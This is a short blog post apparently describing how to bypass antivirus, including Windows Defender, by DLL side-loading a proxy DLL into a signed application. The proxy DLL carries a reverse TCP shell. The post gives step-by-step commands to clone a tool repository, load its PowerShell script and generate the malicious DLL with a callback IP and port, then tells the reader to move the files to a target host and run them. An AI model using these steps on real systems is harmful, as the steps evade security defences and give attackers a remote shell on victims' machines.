Bypassing AV's using DLL Side-Loading

In one of my earlier blog posts, I talked about and released a working PowerShell script to dump DLL Function calls from a signed executable, compile a “proxy” DLL and successfully run a DLL Sideloading attack.DLL Side-Loading allows you to make “safe” and singed applications run whatever code you want ( Application that load DLL’s in an unsafe way that is ) This time we will look into using this to bypass AV’s, including the latest version of Windows Defender. We are working out of the same context from the earlier blog post, so go read that first! To make this as easy as possible we are going to implement a simple reverse TCP connection in C++ inside the “proxy” DLL (B), instead of using an extra 3 DLL. (C)

DLL SideLoading

C++ source for a simple reverse shell to run at entry point, slightly modified source from sh3llc0d3r1337 GitHub Let’s get started

Generate “proxy” DLL

OPS! Make sure you have THE 2019 version of “Build Tools for Visual Studio” installed

Clone my DLL-Sideloading project from Github, load the powershell script into the session and execute the following function. The repository contains a binary copy of “DLL Export VIewer”, a great freeware and tool published by Nir Sofer Our PowerShell script uses this application to dump the function call names from the DLL, feel free to download and place the binary from nirsoft directly if you don’t feel comfortable with using the one provided by me.

git clone https://github.com/SkiddieTech/DLLSideloader
    
cd DLLSideloader
    
. ./DLLSideloader.ps1
    
Invoke-AVBypassDLLSideLoad libcurl.dll 192.168.1.20 1337

The powershell script will (hopefully) run like below

powershell output

The following files are generated.

file after run

Profit

After moving the files over to the target host, make sure they are all inn the same directory and execute application!